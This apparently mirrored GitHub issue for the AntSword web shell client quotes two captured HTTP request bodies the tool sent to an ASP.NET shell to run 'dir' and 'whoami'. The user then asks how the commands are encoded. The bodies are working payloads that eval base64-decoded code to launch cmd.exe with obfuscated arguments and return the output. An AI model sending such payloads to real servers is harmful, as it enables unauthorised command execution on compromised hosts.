Giters

AntSwordProject / antSword

**蚁剑是一款跨平台的开源网站管理工具。AntSword is a cross-platform website management toolkit.

Home Page:https://www.yuque.com/antswordproject/antsword

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

how it work?

Sqliman opened this issue · comments

commented

1 request(dir)
86d3=Response.Write("d681f" "ad4cba");var err:Exception;try{eval(System.Text.Encoding.GetEncoding("UTF-8").GetString(System.Convert.FromBase64String("var c=new System.Diagnostics.ProcessStartInfo(System.Text.Encoding.GetEncoding("UTF-8").GetString(System.Convert.FromBase64String(Request.Item["tce6a06fd985ff"].substr(2))));var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c "+System.Text.Encoding.GetEncoding("UTF-8").GetString(System.Convert.FromBase64String(Request.Item["s6944bca71c08e"].substr(2)));if(Request.Item["u56b7825a1a38d"].substr(2)) {var envstr = System.Text.Encoding.GetEncoding("UTF-8").GetString(System.Convert.FromBase64String(Request.Item["u56b7825a1a38d"].substr(2)));var envarr = envstr.split("|||asline|||");var i;for (var i in envarr) {var ss = envarr[i].split("|||askey|||");if (ss.length != 2) {continue;}c.EnvironmentVariables.Add(ss[0],ss[1]);}}e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());")),"unsafe");}catch(err){Response.Write("ERROR:// " err.message);}Response.Write("d80f5" "3bc54");Response.End();&s6944bca71c08e=QEY2QgL2QgIkM6L2luZXRwdWIvd3d3cm9vdC9hc3BuZXRfY2xpZW50IiZkaXImZWNobyA5YzVmZjI0OTRkZCZjZCZlY2hvIDJiNmZiOA==&tce6a06fd985ff=i4Y21k&u56b7825a1a38d=FY

2 reqeust(whoami)
86d3=Response.Write("f60" "b83");var err:Exception;try{eval(System.Text.Encoding.GetEncoding("UTF-8").GetString(System.Convert.FromBase64String("var c=new System.Diagnostics.ProcessStartInfo(System.Text.Encoding.GetEncoding("UTF-8").GetString(System.Convert.FromBase64String(Request.Item["tce6a06fd985ff"].substr(2))));var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c "+System.Text.Encoding.GetEncoding("UTF-8").GetString(System.Convert.FromBase64String(Request.Item["s6944bca71c08e"].substr(2)));if(Request.Item["u56b7825a1a38d"].substr(2)) {var envstr = System.Text.Encoding.GetEncoding("UTF-8").GetString(System.Convert.FromBase64String(Request.Item["u56b7825a1a38d"].substr(2)));var envarr = envstr.split("|||asline|||");var i;for (var i in envarr) {var ss = envarr[i].split("|||askey|||");if (ss.length != 2) {continue;}c.EnvironmentVariables.Add(ss[0],ss[1]);}}e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());")),"unsafe");}catch(err){Response.Write("ERROR:// " err.message);}Response.Write("beb" "a80d");Response.End();&s6944bca71c08e=zmY2QgL2QgIkM6XFxpbmV0cHViXFx3d3dyb290XFxhc3BuZXRfY2xpZW50IiZ3aG9hbWkmZWNobyA5YzVmZjI0OTRkZCZjZCZlY2hvIDJiNmZiOA==&tce6a06fd985ff=G6Y21k&u56b7825a1a38d=aG

Question: how does it work? How is whoami/dir encoded? In what function?